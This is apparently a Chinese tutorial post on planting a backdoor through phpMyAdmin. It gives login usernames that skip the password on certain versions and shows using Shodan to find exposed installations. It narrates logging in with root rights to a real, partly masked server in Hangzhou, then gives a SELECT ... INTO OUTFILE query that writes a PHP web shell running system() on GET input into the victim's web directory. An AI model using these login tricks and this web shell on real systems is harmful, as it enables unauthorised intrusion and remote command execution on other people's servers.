phpMyAdmin通过密码漏洞留后门文件
- 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
- 版本 2.11.3~2.11.4:用户名
'localhost'@'@"
登陆,无需密码。 - 版本 2.11.9.2:用户名
root
登陆,无需密码。
经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。
下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin
先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。
地址已手动打码。
http://121.***.*.219:80/
登陆成功(root 权限)。
接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。
SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"
点击运行,不出意外便在对方主机留下了一个名为 runme.php
的后门文件。
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对脚本之家的支持。如果你想了解更多相关内容请查看下面相关链接
相关文章
windows服务器使用IIS时thinkphp搜索中文无效问题
在用ThinkPHP开发的网站,在linux服务器下使用过一段时间,一切正常。但是更换到windows服务器时,发现搜索的时候,无法搜索中文,查不出相应的结果。查看数据库发现数据是存在的。linux服务器下正常,而且搜索数字或字母程序正常,说明程序是没有任何问题的。2023-06-06php使用PDO下exec()函数查询执行后受影响行数的方法
这篇文章主要介绍了php使用PDO下exec()函数查询执行后受影响行数的方法,结合实例形式分析了php在使用pdo进行增删改操作时exec()函数查询操作执行后受影响行数的相关实现技巧与注意事项,需要的朋友可以参考下2017-03-03
最新评论